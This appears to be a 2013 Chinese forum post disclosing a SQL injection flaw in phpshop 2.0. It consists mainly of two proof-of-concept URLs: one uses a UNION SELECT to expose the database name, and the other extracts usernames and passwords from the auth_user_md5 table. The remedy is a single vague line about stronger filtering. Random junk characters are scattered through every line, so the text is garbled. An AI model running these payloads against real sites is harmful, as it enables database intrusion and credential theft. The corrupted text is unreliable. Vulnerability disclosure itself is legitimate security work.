标题 : phpshop 2.0 SQL Injection Vulnerability" N6 s' Z) V4 T5 y0 D6 k
/ x$ c$ R3 h% ?0 H& x3 a作者 : By onestree) x! j/ s/ B! }% }( l' k; x, p' W3 \
下载地址 : http://code.google.com/p/phpshop/downloads/list' d; Y K, q, d
测试地址: windows 7 / ubuntu I/ a ^9 `4 ^' y7 m" g: `* F
6 C* g( X* ?/ }1 q! m% n9 [" R ! K: H) w# i+ `2 C' L+ @
SQLi p0c:
4 p# W- N0 [" b1 j0 u Q * T6 v' L! g) T$ w- Z+ ^) \
==================
" i8 h! V6 ~" P# _! t$ J - s% |5 B; a$ A" {- r) Q
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'7 v4 b5 B) O s, N/ v
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
6 t% H" m8 p2 u, a1 m " ~! J2 Y: e. P: M1 d
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--# A, Y0 g2 V, x: \
% c4 w. d, B5 U% o1 v9 i5 L
修复:
8 C$ n4 h+ }4 {' |0 W( u加强过滤
( `- G5 U" r$ g# X
* W. N% ]) `7 ~6 l2 J7 E3 \/ j& y" \9 v
4 q, M- f# o( ^ q8 w |
发表于 2013-1-18 18:24:10
收藏
支持
反对